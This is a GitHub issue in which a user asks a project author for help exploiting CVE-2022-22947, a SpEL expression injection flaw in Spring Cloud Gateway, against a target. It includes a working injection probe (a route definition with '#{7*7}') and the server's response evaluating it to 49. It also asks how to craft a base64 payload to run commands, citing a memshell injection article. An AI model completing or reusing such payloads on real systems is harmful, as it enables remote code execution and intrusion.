Skip to content

CVE-2022-22947 Spring cloud gateway some problems #93

New issue
New issue
Open
Open
CVE-2022-22947 Spring cloud gateway some problems#93
@Phoenix1112

Description

@Phoenix1112
Phoenix1112
opened on Aug 26, 2023

hello. thanks for this project. you are amazing. I need help with some issues.first of all, my target seems to be sensitive to some payloads I use.

request with 7*7 payload

{
  "id": "test",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{7*7}"
    }
  }],
  "uri": "http://example.com",
"order":0
}

response:

{"predicate":"RouteDefinitionRouteLocator$$Lambda$1866/0x0000000840cf8c40","route_id":"test","filters":["[[AddResponseHeader Result = '49'], order = 1]"],"uri":"http://example.com:80","order":0}

In a request like the one above, we can see the result of 49 in the response. but when I try the payloads where I can run the "id" command in the payload, nothing is added to the routes section.When I tried other payloads on the market, the result did not change. Then I started reading your post below.

https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/

After reading the above topic, I saw a payload prepared with base64 code.

image

How did you prepare the base64 code in the payload? for example I need a base64 code from which I can run the "id" command. Can you write how and with what program you did this and the writing of your command? Thank you in advance for your answer.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions